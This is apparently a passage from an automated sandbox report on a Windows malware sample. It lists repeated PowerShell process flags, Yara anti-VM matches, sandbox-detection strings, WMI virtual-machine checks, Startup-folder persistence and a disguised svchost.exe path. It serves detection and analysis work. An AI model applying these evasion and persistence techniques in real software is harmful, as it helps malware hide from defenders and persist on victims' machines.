                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 481F404B.exe PID: 6392, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\System32\svchost.exe TID: 6036Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6296Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep count: 3116 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6560Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep count: 109 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6348Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep count: 1460 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 1154 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 1756 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 204 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep count: 1958 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep count: 62 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep count: 2068 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 106 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6696Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6700Thread sleep count: 4209 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6700Thread sleep count: 3142 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6696Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3337Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3116
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1460
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1154
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1756
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1958
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2068
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 4209
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 3142
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
